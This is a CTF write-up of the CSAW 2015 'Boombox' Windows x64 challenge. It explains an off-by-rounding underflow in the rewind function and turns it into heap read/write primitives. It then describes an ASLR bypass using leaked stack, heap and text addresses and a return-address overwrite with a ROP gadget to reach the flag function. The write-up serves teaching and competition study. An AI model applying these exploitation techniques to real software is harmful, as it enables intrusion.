Boombox is a windows 8.1 x64 pwning challange created by Markus Gaasedelen for CSAW finals 2015. Sadly we ended up putting this challange off for too long during the ctf and ran out of time to solve it.

However he offered it up as a challange to people on RPISEC, so I decided to try it out again.

Boombox is run with AppJailLauncher, and implements a system for storing "songs" on different tracks on different "mixtapes". There is many actions you can do to these tapes, such as rewind, play, record, seek, and fastforward. Though reverse engineering these functions, I put together what these structures looked like.

struct boombox_state {
    uint32_t selected_track_index;
    uint32_t selected_mixtape;
    uint64_t position_in_track;
    mixtape * mixtape_list[10];

struct mixtape {
    boombox_state * global_state;
    char mixtape_name[0x20];
    uint64_t number_of_tracks;
    track * track_list[10];

struct track {
    char track_name[0x20];
    uint64_t track_length;
    char track_data[0x200];

It is important to note that the global boombox_state struct is located inside the stackframe of the main method. There is also an option to create mixtapes, which mallocs a mixtape struct and up to 10 track structs to go with it. You then can enter raw bytes for it to store in the tracks.

The vulnerability in this program lies in the rewind function. It allows you to "rewind" for a period of time and then attempt to subtract four times the number of seconds waited from the track position. However, there is an order of operations difference between the underflow check and the actual subtractions:

timeDiff = GetTickCount() - oldTime;
underflowCheckVar = 4 * (timeDiff / 1000);
if ( underflowCheckVar ) {
    if ( ((state_->position - underflowCheckVar) & 0x80000000) == 0 ) {
        state_->position -= 4 * timeDiff / 1000;
        formatted_print("Rewind stopped!\n", 5);
    else {
        state_->position = 0;
        formatted_print("Reached start of track\n", 5);

If you rewind by 1.9 seconds, 4 * (timeDiff / 1000) will equate to 4, while the actual subtraction (4 * timeDiff / 1000) will equate to 7. So we can get an underflow by 3 in the track position. This also means that we can write 3 bytes before the data buffer in the track struct, smashing the 3 most significant bytes of track_length. By seeking to some offset in that we can preform track operations at somewhat arbitrary offsets.

Read / Write Primitives
Although we have a very large size, it is not large enough to allow for small negative offsets, which prevents us from getting full arbitrary write. We also want to try and get arbitrary read, since ALSR is enabled and we do not know where anything is. We can attempt to leak some data by using the "play" function, which encodes the track data as sound effects and prints it to the screen. However it attempts to encode the entire track, and so with the huge track length we have, it hit invalid memory and crashes.

To fix these problems we can use the corrupted size of one track to directly write over the size of a second track. Setting the second track's size to int_max would allow us to get arbitrary write, even to small negative offsets, and by setting it to the offset we want to read plus the length of the data, we can prevent the runaway read in the play function.

With these two primitives, it is time to look for things that we can leak and modify to get our flag. Our goal is clear: We want to call the function at offset 0x3820 which opens the flag file and print it to the console. The easiest way to do this is to overwrite a return address on the stack. However we do not know where the text section will be, or where the stack will be when we run it. We also don't know the location of the heap to calculate our offsets from. Luckly the mixtape struct contains the golden ticket. It has both pointers to the heap (via the track pointers) and a pointer to the boombox_state struct on the stack. By using the stack address we can then read the return address and get the text segment location.

However, the difficulty is in finding the offset from the track structs to the mixtape struct. Every time AppJailLauncher is run the offset would be different (however between subsequent runs with the same AppJailLauncher instance the offset remained constant.) This offset also varied by about 0x5000, so I decided to try and dump a large section of the remote heap on the same AppJailLauncher instance to look for the mixtape name I set. It was a somewhat slow processes since the remote server kept disconnecting at random, but eventually the offset was found (It ended up being -0x5478 bytes from our track on the remote instance I run against.)

051b8: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
051d8: 0000000000000000 0000000000000000 0000000000420000 0000000000000000
051f8: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
05218: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
052d8: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
052f8: 0000000000000000 0000000000000000 0000000000210000 0000000000000000
05318: 0000002000000000 0000000000000000 0000000000000000 0000000000000000
05338: 0000000000000042 0000000000000000 0000000000000000 0000004000000000
05358: 0000000000000000 0000000000000000 0000002100420000 0000000000000000
05378: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
05398: 0000000000410000 0000000000000000 0063000000200000 0000000000000021
053b8: 0021002100000081 0000000000200020 000000a500210020 0000000000210000
053d8: 0000000000000000 0100821da8372ec6 0002000100210000 0041020901ac0084
053f8: 3d524559414c5f54 4365746176656c45 6f72506574616572 0000000073736563
05418: 77006674635c7372 3a433d7269646e69 73776f646e69575c 41504d4f435f5f00
05438: 4d414e5245535500 5355006674633d45 4c49464f52505245 6573555c3a433d45
05458: 0000000000000000 0000000000000002 000000fb0b2eb1a0 000000fb0b2eb3d0
05478: 000000fb0b27fa90 0000000074736574 0000000000000000 0000000000000000 "test"=74736574 Our mixtape name
05498: 000000fb0b2e5a90 00007ffc62521ccc 6f626d6f6f625c73 200082152a3f2e4c
054b8: 6d65545c43415c65 08008257223f2e44 00007ffc625a8870 0000000100000001
054d8: 4c5c617461447070 6361505c6c61636f 6f625c736567616b 78652e786f626d6f
054f8: 6e69575c3a433d74 80001c00263d71d6 6573555c3a433d50 415c6674635c7372
05518: 0031237063542d50 80001b65263b71c8 53003a433d657669 6f6f526d65747379
05538: 6573555c3a433d43 80001a75263971ca 4f49535345530063 44523d454d414e4e
05558: 537265776f507377 8000195c263771cc 656c75646f4d5c30 494c425550005c73
05578: 433d68746150656c 8000186e263571ce 6d65747379735c73 6f646e69575c3233
05598: 206d6172676f7250 8000177341016a29 2450243d54504d4f 75646f4d53500047
055b8: 656c6946206d6172 8000163841036a2b 576d6172676f7250 5c3a433d32333436

With this offset it was now a simple matter of using our read primitives to read the heap, stack, and text addresses. Finally we use our write primitive to change the return address to our win function. However it seemed overwriting the return address from main was causing our win function to crash, so I ended up overwriting that address with a NOP ROP gadget (actually returning to the print menu for visual confirmation that our exploit was working) and then having the next address be the win function.

$ python remote
Setting up...Done
Stack Leak: 0x000000a89565fd20
Heap Leak: 0x000000a89573b3d0
Text Leak: 0x00007ff7221f40ef
| +----------------------+
| | 1. upload mixtape    |
| | 2. eject mixtape     |
| | 3. select mixtape    |
| | 4. play              |
| | 5. fast forward      |
| | 6. rewind            |
| | 7. next track        |
| | 8. previous track    |
| | 9. record            |
| | 10. seek             |
| | 11. print menu       |
| | 12. exit             |
| +----------------------+

The final code can be found here.